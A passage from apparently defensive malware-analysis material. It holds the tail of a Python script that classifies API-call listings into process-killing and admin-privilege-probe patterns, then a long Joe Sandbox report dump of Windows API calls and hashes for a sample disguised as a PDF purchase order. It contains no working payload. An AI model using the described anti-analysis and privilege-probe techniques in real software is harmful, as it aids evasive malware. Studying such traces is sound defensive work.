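        findings.append("privilege probe: OpenSCManagerW(SC_MANAGER_LOCK) + LockServiceDatabase succeeds only with administrative rights under the default SCM DACL")
    return findings

if __name__ == "__main__":
    for title, listing in (("window kill", SAMPLE_KILL), ("SCM lock", SAMPLE_SCM)):
        calls = parse_listing(listing)
        print(f"== {title} ==")
        for c in calls:
            print(f"  {c.ref:08X} {c.api}.{c.module} {' '.join(annotate(c))}")
        for finding in classify(calls):
            print("  ->", finding)
```

The point of the first pattern is the order of operations: a polite WM_CLOSE with a 500 ms SMTO_ABORTIFHUNG timeout, and then an unconditional TerminateProcess on whichever process owns the window, which is what a hunter would expect from anti-analysis or competitor-killing code rather than from a document viewer. The second pattern never uses the service database at all; acquiring and immediately releasing the lock only tells the caller whether it holds administrative rights, which is why the result is read back through GetLastError.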
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00475D71
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk$HH
• API String ID: 886957087-3121654589
• Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
• Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
• Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
• Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
• Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
• Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
• Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
• Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
• SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
• SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 763830540-1403004172
• Opcode ID: 44fe3b85dcbf90c67fff98854e7c77623399059caca8f2f1d868b760baf55fc2
• Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
• Opcode Fuzzy Hash: 44fe3b85dcbf90c67fff98854e7c77623399059caca8f2f1d868b760baf55fc2
• Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
APIs
• GetStdHandle.KERNEL32(?), ref: 004439B4
  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CurrentHandleProcess$Duplicate
• String ID: nul
• API String ID: 2124370227-2873401336
• Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
• Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
• Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
• Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 004438B7
  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CurrentHandleProcess$Duplicate
                                                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                                                            • API String ID: 2124370227-2873401336
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                                                                                                                                                                                                            • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                                                                                                                                                                                                                            Strings
Similarity
• API ID: MessageSend$DestroyLibraryLoadWindow
• String ID: SysAnimate32
• API String ID: 3529120543-1011021900
• Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
• Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
• Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
• Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
APIs
• PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
• TranslateMessage.USER32(?), ref: 0044308B
• DispatchMessageW.USER32(?), ref: 00443096
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
Strings
Similarity
• API ID: Message$Peek$DispatchTranslate
• String ID: *.*
• API String ID: 1795658109-438819550
• Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
• Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
• Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
• Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
APIs
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
  • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
  • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
  • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
  • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
• GetFocus.USER32 ref: 004609EF
  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
• GetClassNameW.USER32(?,?,00000100), ref: 00460A37
• EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
• __swprintf.LIBCMT ref: 00460A7A
Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: %s%d
                                                                                                                                                                                                                                                                                                            • API String ID: 991886796-1110647743
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                                                                                                                                                                                                            • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _memset$_sprintf
                                                                                                                                                                                                                                                                                                            • String ID: %02X
                                                                                                                                                                                                                                                                                                            • API String ID: 891462717-436463671
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                                                                                                                                                                                                            • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0042CD00
                                                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,?,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,004A8E80,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                                                                                                                                                                                                            • String ID: $OH$@OH$X
                                                                                                                                                                                                                                                                                                            • API String ID: 3491138722-1394974532
                                                                                                                                                                                                                                                                                                            • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                                                                                                                                                                                            • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
• GetProcAddress.KERNEL32(?,?), ref: 00463ECE
• FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID:
• API String ID: 2449869053-0
APIs
• GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
• SetKeyboardState.USER32(00000080), ref: 0044C3ED
• PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
• PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
• SendInput.USER32 ref: 0044C509
Similarity
• API ID: KeyboardMessagePostState$InputSend
• String ID:
• API String ID: 3031425849-0
APIs
• RegEnumKeyExW.ADVAPI32 ref: 004422F0
• RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
• RegCloseKey.ADVAPI32(00000000), ref: 0044234E
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
• RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
Similarity
• API ID: Enum$CloseDeleteOpen
• String ID:
• API String ID: 2095303065-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
• GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
• WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
• WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                                                                                                                                                                                            • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00447997
                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004479A2
                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                                                                                                                                                                                                                                            • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1822080540-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                                                                                                                                                                                                            • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
